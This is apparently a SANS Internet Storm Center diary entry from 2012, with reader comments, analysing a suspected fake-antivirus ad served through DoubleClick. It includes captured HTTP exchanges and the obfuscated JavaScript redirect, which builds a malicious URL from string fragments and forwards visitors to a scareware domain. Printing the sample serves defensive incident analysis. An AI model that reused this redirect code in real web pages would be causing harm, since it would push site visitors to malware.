Possible Fake-AV Ads from Doubleclick Servers

Possible Fake-AV Ads from Doubleclick Servers
Reader James ran into a Fake AV ad delivered by Double click. It is not clear if this is the result of a compromise of double click, or a paid ad that slipped through doubleclick's content review process. James' started out at a local new paper web site, that like many others features ads served by double click. Luckily, James used a proxy tool (Fiddler) to record the session. Here are some of the excerpts (slightly anonymized and spaces inserted to avoid accidental clicks): `GET http://ad.doubleclick.net/adj/mi.ida00/News;atf=n;dcove=d;pl=sectfront;sect=News; pos=2;sz=300x250;tile=8;!c=news;gender=;year=;income=;ord=230528779772346? HTTP/1.1 Accept: / Referer: [local newspaper URL] Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; [...] Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Connection: Keep-Alive Cookie: id=xxxxa\|\|t=1352150000\|et=730\|cs=yyyy` `The reply to this request was:` `HTTP/1.1 200 OK` `Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 167 Date: Mon, 05 Nov 2012 22:32:59 GMT` `document.write(' src=\"http://inc cam paign.com/jsb.php?id=29585&w=b&t=j&u=13\">');document.write('');` `This is typical "doubleclick". The add returns a reference to some javascript. At this point, this isn't quite suspicious yet. But let's see what we get back from "inccampaign.com":` `if we access the site with wget (but fake the user agent), we get back:` http://inc cam paign.com/pr/b/29585.jpg . This is a harmless image, advertising luxury watches (these days of course, a luxury watch ad suggests a link to spamming). James on the other hand got the following content back (I wasn't able to reproduce this): `document.write(' ');` `var url = 'http:'+'//fav'+'ozek.'+'info/'+'in.ph'+'p?q=8'+'/CEg1'+'rjwdE'+'mPDwt'+'BLw6u'+'Sk36+'+'lyOya'+'TxYF9'+'UkLXx'+'A==' ;` `if (window != top) { top.location.replace(url) } else { window.location.replace(url) }` The content starts very similar, but his copy included additional javascript, forwarding the user to 'fav ozek.info' . The domain is somewhat new (October 12 2012) and registered with Privacyprotect.org. Right now, none of the domains is listed as malicious in virustotal. Still digging deeper into this, but right now, this looks at least suspicious. Let me know if you see similar issues with double click ads. ------ Johannes B. Ullrich, Ph.D. SANS Technology Institute Twitter I will be teaching next: Intrusion Detection In-Depth - SANS Blue Team and Purple Team 2020	Johannes 3871 Posts ISC Handler Nov 6th 2012
Subscribe	Nov 6th 2012 7 years ago
Not seen anything, but wanted to note that it's unlikely I would - I've been explicitly blocking .doubleclick. for over a decade, due to seeing subverted ads even back then.	Peter Bance 9 Posts
Quote	Nov 6th 2012 7 years ago
Not the first nor the last time this has happened. One usual trick is to submit reasonably valid ads, run them momentarily and then swap them out for the high ROI scareware. DoubleClick's seemingly all automated so no human ever attempts to vet garbage out of the system. AdBlock Plus for the win.	Peter Bance 57 Posts
Quote	Nov 6th 2012 7 years ago

Reader James ran into a Fake AV ad delivered by Double click. It is not clear if this is the result of a compromise of double click, or a paid ad that slipped through doubleclick's content review process. James' started out at a local new paper web site, that like many others features ads served by double click. Luckily, James used a proxy tool (Fiddler) to record the session. Here are some of the excerpts (slightly anonymized and spaces inserted to avoid accidental clicks):

GET http://ad.doubleclick.net/adj/mi.ida00/News;atf=n;dcove=d;pl=sectfront;sect=News; pos=2;sz=300x250;tile=8;!c=news;gender=;year=;income=;ord=230528779772346? HTTP/1.1 Accept: */* Referer: [local newspaper URL] Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; [...] Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Connection: Keep-Alive Cookie: id=xxxxa||t=1352150000|et=730|cs=yyyy

The reply to this request was:

HTTP/1.1 200 OK

Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 167 Date: Mon, 05 Nov 2012 22:32:59 GMT

document.write(' src=\"http://inc cam paign.com/jsb.php?id=29585&w=b&t=j&u=13\">');document.write('');

This is typical "doubleclick". The add returns a reference to some javascript. At this point, this isn't quite suspicious yet. But let's see what we get back from "inccampaign.com":

if we access the site with wget (but fake the user agent), we get back:

http://inc cam paign.com/pr/b/29585.jpg . This is a harmless image, advertising luxury watches (these days of course, a luxury watch ad suggests a link to spamming).

James on the other hand got the following content back (I wasn't able to reproduce this):

document.write(' ');

var url = 'http:'+'//fav'+'ozek.'+'info/'+'in.ph'+'p?q=8'+'/CEg1'+'rjwdE'+'mPDwt'+'BLw6u'+'Sk36+'+'lyOya'+'TxYF9'+'UkLXx'+'A==' ;

if (window != top) { top.location.replace(url) } else { window.location.replace(url) }

The content starts very similar, but his copy included additional javascript, forwarding the user to 'fav ozek.info' . The domain is somewhat new (October 12 2012) and registered with Privacyprotect.org. Right now, none of the domains is listed as malicious in virustotal.

Still digging deeper into this, but right now, this looks at least suspicious. Let me know if you see similar issues with double click ads.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

I will be teaching next: Intrusion Detection In-Depth - SANS Blue Team and Purple Team 2020

Johannes

3871 Posts
ISC Handler

Nov 6th 2012

Not seen anything, but wanted to note that it's unlikely I would - I've been explicitly blocking *.doubleclick.* for over a decade, due to seeing subverted ads even back then.

Peter Bance

9 Posts

Not the first nor the last time this has happened. One usual trick is to submit reasonably valid ads, run them momentarily and then swap them out for the high ROI scareware. DoubleClick's seemingly all automated so no human ever attempts to vet garbage out of the system. AdBlock Plus for the win.

Peter Bance
57 Posts